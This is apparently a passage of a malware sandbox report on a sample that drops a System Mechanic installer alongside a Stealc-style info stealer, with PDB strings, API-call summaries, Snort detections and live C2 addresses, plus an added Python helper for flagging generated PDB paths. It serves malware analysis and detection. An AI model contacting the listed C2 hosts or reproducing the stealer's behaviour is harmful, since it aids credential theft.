Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr
Source: Binary string: mozglue.pdb source: u2ts.0.exe, 00000002.00000002.2633247905.000000006BEDD000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000003.00000000.2099921681.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000003.00000002.2166899823.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000016.00000000.2585114842.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000016.00000002.2691006504.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe.0.dr
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318821153.0000021738120000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3243252016.0000021717B20000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000003.00000002.2170329966.000000006C827000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 00000016.00000002.2733109861.000000006C7D7000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296044980.0000021731FB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3243326923.0000021717B30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3243326923.0000021717B30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3289012458.0000021731C70000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3289012458.0000021731C70000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: wntdll.pdbUGP source: run.exe, 00000003.00000002.2169721590.0000000004A01000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169460946.0000000004550000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169111990.00000000041F6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613691350.0000000004D68000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613947415.0000000005240000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000016.00000002.2706144763.000000000410D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000016.00000002.2703363636.00000000039F1000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000016.00000002.2705188750.0000000003D50000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2871966588.000000000517A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873741315.0000000005650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.000002172935C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3319355291.0000021738BD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: P[<_C:\sedoh\56\sizagabucusa xayipo\8-rinuhololoz\nuzunum dor.pdb source: sx8RE6LbG0.exe, 00000000.00000003.2019130046.0000000003701000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000000.2018347583.0000000000412000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: I[L<C:\jizafova\bugu-44_jikeg_37\kisusilogeguw\rawubexuh.pdb source: sx8RE6LbG0.exe
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: nss3.pdb source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\sedoh\56\sizagabucusa xayipo\8-rinuhololoz\nuzunum dor.pdb source: sx8RE6LbG0.exe, 00000000.00000003.2019130046.0000000003701000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000000.2018347583.0000000000412000.00000002.00000001.01000000.00000005.sdmp
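The PDB strings above fall into two groups: real build-tree paths (Jenkins workspaces, TFS mainlines, a Visual Studio project, NSS's freebl3/nss3) that belong to the legitimate System Mechanic installer and its libraries, and two paths from sx8RE6LbG0.exe and u2ts.0.exe (`C:\sedoh\56\sizagabucusa xayipo\...`, `C:\jizafova\bugu-44_jikeg_37\...`) that are random syllable strings rather than anything a developer would type. Some strings also carry bytes of the CodeView record in front of the drive letter (`P[<_`, `I[L<`), which must be stripped before the path is compared or searched. The Python below is an added triage helper written for this page, not part of the sandbox or of either sample; the build-token list and the consonant/vowel heuristic are assumptions chosen to separate these two groups, and the last entry in the sample list is a constructed control path, not a string from the report.

```python
import re

# Assumption: a real build path almost always contains one of these directory
# names. A path with none of them, whose components are random-looking words,
# is treated as generated.
BUILD_TOKENS = {
    "obj", "bin", "release", "debug", "src", "workspace", "projects",
    "jenkins-slave", "tfs", "mainline", "users", "build", "buildtools",
}

# The generator behind these samples emits lowercase words of strict
# consonant-vowel alternation ("sizagabucusa", "rinuhololoz"), optionally
# ending in one consonant. Assumption: 75% of words matching = generated.
CV_WORD = re.compile(r"^(?:[bcdfghjklmnpqrstvwxyz][aeiou])+[bcdfghjklmnpqrstvwxyz]?$")
DRIVE = re.compile(r"[A-Za-z]:\\")


def clean_pdb_path(raw):
    """Drop the CodeView GUID/age bytes the sandbox prints before the drive
    letter (e.g. 'P[<_C:\\...'), and any junk after '.pdb'."""
    m = DRIVE.search(raw)
    path = raw[m.start():] if m else raw
    return re.sub(r"(?i)(\.pdb).*$", r"\1", path)


def syllable_words(component):
    # alphabetic chunks of a directory or file stem, ignoring digits/separators
    return [w for w in re.split(r"[^a-z]+", component.lower()) if len(w) >= 4]


def looks_generated(raw):
    path = clean_pdb_path(raw)
    if "\\" not in path and "/" not in path:
        return False                      # bare 'nss3.pdb': nothing to judge
    parts = re.split(r"[\\/]", path)
    dirs, stem = parts[1:-1], re.sub(r"(?i)\.pdb$", "", parts[-1])
    if any(d.lower() in BUILD_TOKENS for d in dirs):
        return False
    words = [w for comp in dirs + [stem] for w in syllable_words(comp)]
    if not words:
        return False
    return sum(1 for w in words if CV_WORD.match(w)) / len(words) >= 0.75


def triage_pdb_strings(raw_strings):
    """Map each cleaned path to True (generated) or False (plausible build path)."""
    return {clean_pdb_path(s): looks_generated(s) for s in raw_strings}


# Strings taken from the report above, plus one constructed control (last).
SAMPLE_STRINGS = [
    r"P[<_C:\sedoh\56\sizagabucusa xayipo\8-rinuhololoz\nuzunum dor.pdb",
    r"I[L<C:\jizafova\bugu-44_jikeg_37\kisusilogeguw\rawubexuh.pdb",
    r"C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf",
    r"/_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256",
    r"D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb",
    r"c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb",
    "wntdll.pdbUGP",
    "nss3.pdb",
    r"C:\work\tool\helper.pdb",  # constructed control: no build tokens, real words
]

if __name__ == "__main__":
    for path, generated in triage_pdb_strings(SAMPLE_STRINGS).items():
        print("GENERATED " if generated else "build path", path)
```

The cleaned path, not the raw string, is what should go into a YARA rule or a retro-hunt, since the leading bytes differ per process dump and the trailing junk (`pdbf`, `pdbSHA256`, `pdbUGP`) is just whatever followed the NUL in memory.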
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0041D8B1 FindFirstFileExA, 0_2_0041D8B1
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0368DB18 FindFirstFileExA, 0_2_0368DB18
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_004015C0 VirtualProtect,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 2_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 2_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 2_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 2_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_6C72261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 3_2_6C72261E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File opened: C:\Users\user\AppData\Local\Temp\u2ts.2 Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File opened: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File opened: C:\Users\user\AppData\Local Jump to behavior

Networking

Source: Traffic Snort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.5:49705 -> 185.172.128.90:80
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49708 -> 185.172.128.150:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49708 -> 185.172.128.150:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.150:80 -> 192.168.2.5:49708
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49708 -> 185.172.128.150:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 185.172.128.150:80 -> 192.168.2.5:49708
Source: Malware configuration extractor URLs: http://185.172.128.150/c698e1bc8a2f5e6d.php
Source: Malware configuration extractor URLs: http://185.172.128.150/c698e1bc8a2f5e6d.php
Source: global traffic TCP traffic: 91.215.85.66 ports 9000,1,4,5,6,7,15647
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49786
